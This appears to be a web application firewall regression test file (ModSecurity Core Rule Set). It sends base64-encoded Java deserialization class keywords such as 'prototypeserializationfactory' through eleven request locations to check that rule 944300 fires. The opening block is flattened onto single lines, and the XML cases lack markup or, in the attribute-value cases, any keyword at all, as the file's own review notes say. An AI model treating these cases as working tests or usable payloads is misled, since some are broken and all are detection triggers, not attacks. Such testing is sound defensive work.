Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-242 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-243 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-244 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: 
"test=value" output: log_contains: "id \"944300\"" - test_title: 944300-245 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-246 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-247 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-248 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: 
dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-249 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-250 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-251 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-252 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-253 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-254 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" output: log_contains: "id \"944300\"" - test_title: 944300-255 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-256 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-257 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk 
method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-258 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-259 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-260 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-261 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" 
port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\""
  # The line above is the tail of a test that starts before this span; it is
  # left exactly as found.
  #
  # Positive regression cases for rule id 944300. Every case passes only if
  # the log contains `id "944300"` (see log_contains).
  # Each keyword is placed in the same eleven request locations: argument
  # value, argument name, cookie value, cookie name, request header, three XML
  # shapes, text/plain body, JSON value, JSON name. Presumably this is meant to
  # catch a rule change that stops inspecting one of those locations.
  # NOTE(review): in the XML cases the body carries no XML markup, and in the
  # "XML attribute value" cases it carries no keyword at all (data is just
  # "element_value"). The markup looks stripped from this copy; compare with
  # the upstream test file before trusting those cases.

  # Keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk (earlier cases precede this span).
  - test_title: 944300-262
    desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-263
    desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk, tests 264-274.
  # It base64-decodes to "prototypeserializationfactory".
  - test_title: 944300-264
    desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-265
    desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-266
    desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-267
    desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-268
    desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-269
    desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-270
    desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-271
    desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-272
    desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-273
    desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-274
    desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5, tests 275-285.
  # Presumably the same keyword at another base64 byte alignment - TODO confirm.
  - test_title: 944300-275
    desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-276
    desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-277
    desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-278
    desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-279
    desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-280
    desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-281
    desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
